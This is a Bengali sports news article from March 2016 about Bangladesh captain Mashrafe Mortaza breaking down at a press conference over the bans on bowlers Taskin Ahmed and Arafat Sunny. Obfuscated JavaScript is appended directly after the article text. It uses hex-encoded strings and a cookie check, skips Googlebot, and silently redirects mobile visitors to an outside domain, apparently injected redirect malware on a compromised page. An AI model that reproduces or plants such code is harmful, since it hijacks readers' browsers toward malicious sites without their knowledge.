for Add
: ২০ মার্চ ২০১৬, রবিবার, ২০:২২:১০
তাসকিনকে নিয়ে বলতে গিয়ে কাঁদলেন মাশরাফি, কাঁদালেন উপস্থিত সবাইকে। সাধারণত সংবাদ সম্মেলনে হাসিখুশি ও প্রাণবন্ত থাকেন মাশরাফি। অথচ আজ (রবিবার) যখন সাংবাদিকদের সামনে এলেন, তখন টাইগার অধিনায়কের চেহারায় গাঢ় বিষাদের ছায়া। ছলছল চোখে একেকটা প্রশ্নের জবাব দিতে গিয়ে কন্ঠ আটকে যাচ্ছিল তার। সংবাদ সম্মেলন শেষে চোখের পানি আর ধরে রাখতে পারেননি অধিনায়ক।
বারবার যেতে হয়েছে সার্জনের ছুরির নিচে, তবুও বিপুল বিক্রমে ফিরে এসেছেন মাশরাফি। কখনো ভেঙ্গে পড়েননি। একবারই অঝোর ধারায় কেঁদেছিলেন তিনি। ২০১১ সালের ২০ জানুয়ারি মিরপুর স্টেডিয়ামে দেশের মাটিতে বিশ্বকাপের দল ঘোষণা করা হয়েছিল, যে দলে তার জায়গা হয়নি ইনজুরির অজুহাতে। সাংবাদিকদের সঙ্গে এ বিষয়ে কথা বলতে গিয়ে কেঁদে ফেলেছিলেন মাশরাফি।
পাঁচ বছর পর আবার কাঁদতে হল মাশরাফিকে। উপলক্ষ্যটা প্রায় একই রকম। সেবার উপেক্ষিত হয়েছিলেন, অশ্রুসজল দৃষ্টিতে মিশে ছিল হতাশা আর অসহায়ত্ব। এবার সেখানে জড়ো হয়েছে আরো কিছু অনুভূতি। একজন সম্ভবনাময় প্রতিভার বিরুদ্ধে স্বয়ং ক্রিকেট অধীশ্বরদের এহেন অবিচারে ক্ষোভ আর প্রতিবাদ ছিল মাশরাফির কন্ঠে।
অবিচার শব্দটাই ঘুরেফিরে উঠে এল মাশরাফির কথায়। দলের প্রত্যেকের বিশ্বাস, তাসকিনের বোলিং অ্যাকশনে কোন সমস্যা নেই। বড় ধরনের অবিচার হয়েছে তার প্রতি। পেশাদার দল হিসেবে মতামত প্রকাশে নানা বাধানিষেধ থাকায় কার্যকর পদক্ষেপ নেওয়ার জন্য সবাই তাকিয়ে বিসিবির দিকে।
মাশরাফি জানালেন, সানি-তাসকিনের নিষিদ্ধ হবার খবরটা জানার পর থেকেই বিমর্ষ, ক্ষুব্ধ ও হতাশ ক্রিকেটাররা। চার ঘন্টার রুদ্ধদ্বার বৈঠকে আলোচনা হয়েছে অনেক কিছুই। ক্রিকেটারদের পক্ষ থেকে বিসিবিকে শক্ত প্রতিবাদ করার বার্তা দেওয়া হয়েছে। ক্রিকেটারদের ক্ষোভ যেন বিসিবির কঠিন প্রতিবাদে অনূদিত হয়, এটাই চাওয়া সবার। যেন প্রয়োজনে আইনি পদক্ষেপ নেয়া হয়।
রবিবার অনুশীলনে এসেছিলেন সবাই। কিন্তু সবার চেহারাতেই ছিল বিমর্ষ, হতাশা আর মনমরা ভাব। রুদ্ধদ্বার আলোচনায় আইসিসির নির্ধারিত প্রক্রিয়া মেনে নেওয়ার সিদ্ধান্ত হলেও চাপা ক্ষোভটুকু বেরিয়ে এল মাশরাফির বক্তব্যে।
নিষিদ্ধ হওয়ার খবরে অঝোরে কেঁদেছেন তাসকিন। অধিনায়ক তাকে শান্ত করার আপ্রাণ চেষ্টা করেছেন, কিন্তু এ বিষাদ যে অমোচনীয়। সানিও মুষড়ে পড়েছেন। সোমবার অস্ট্রেলিয়ার বিপক্ষে বিশ্বকাপের গুরুত্বপুর্ন ম্যাচ ছাপিয়ে ২৬ মিনিটের সংবাদ সম্মেলনের বেশিরভাগটা জুড়ে থাকলো দুই সতীর্থকে ঘিরে নিজের ও বাকিদের ভাবনা, অনুভূতি আর যন্ত্রনাগাঁথা।
মলিন হাসিতে একবার বললেন, ‘যে ম্যাচের বোলিংয়ের জন্য ওকে নিষিদ্ধ করা হল, সে ম্যাচের একটা ডেলিভারিও অবৈধ প্রমান করা গেলো না! নেদারল্যান্ডসের সাথে ম্যাচে সে একটা বাউন্সারও দেয় নাই। অথচ বোলিং পরীক্ষায় তিন মিনিটে নয়টা বাউন্সার দিতে বলা হলো তাকে, যার মাত্র তিনটা ১৫ ডিগ্রি সীমা ছাড়িয়েছে।’ বলতে বলতে শ্লেষের হাসি ফুটে উঠলো অধিনায়কের মুখে। তাতে মিশে থাকলো আইসিসির প্রতি প্রছন্ন ক্ষোভ, আক্ষেপ। ছলছল চোখে মাশরাফির ওই বুক ভাঙ্গা হাসিই বলে দিচ্ছিল সব।
তবুও অধিনায়ক ভেঙ্গে পড়েননি। ভেতরটা তোলপাড় করে ফেলা ঝড় সামলে কাঁপা কাঁপা গলাতেও স্পষ্ট উচ্চারনে বলে গেছেন কথাগুলো। আবেগ মেশানো গলায় দৃঢ়তা আর প্রতিবাদ মিলে মিশে একাকার!
তাতে স্তব্ধ সবাই। নিজের দলকে নিয়ে, টিমমেটদের নিয়ে এতোটা আবেগ ধারন করতে পারেন কোন অধিনায়ক, হয়তো প্রথমবারের মত দেখলেন দেশী-বিদেশী সাংবাদিকেরা। সকলেই তাই বিস্মিত, আপ্লুত। মাশরাফির আবেগময় কথা শুনে এবং তারপর সংবাদ সম্মেলন শেষে বাঁধভাঙ্গা আবেগে কাঁদতে দেখে ভারতের দৈনিক বর্তমানের সিনিয়র সাংবাদিক রবীন্দ্র চৌধুরী জয় রীতিমতো হাউমাউ করেই কেঁদে উঠলেন । বারবার বলছিলেন, ‘এমন দৃশ্য আমি জীবনেও দেখিনি রে ভাই। দলের খেলোয়াড়দের জন্য এমন টান, এমন ভালোবাসা কোথাও দেখিনি। ক্রিকেট ইতিহাসে এ ঘটনা কোথাও হয়নি।’
গাড়িতে ওঠার আগে কান্না জড়িত কণ্ঠে অধিনায়ক বললেন, ‘আমার ক্যারিয়ার নিয়ে ভাবি না। হয়ত অনেক শক্ত কথা বলেছি। কিন্তু আমার দেশকে আগামী ১০-১৫ বছর সার্ভিস দেবে যে ছেলেটি, এখন তার পাশে না দাঁড়াতে পারলে আর কিসের অধিনায়ক হলাম! এই অবিচার মানতে পারছি না।’
এমন অধিনায়ক কে কবে দেখেছে আর!var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}
For add
For add
For add
For add
for Add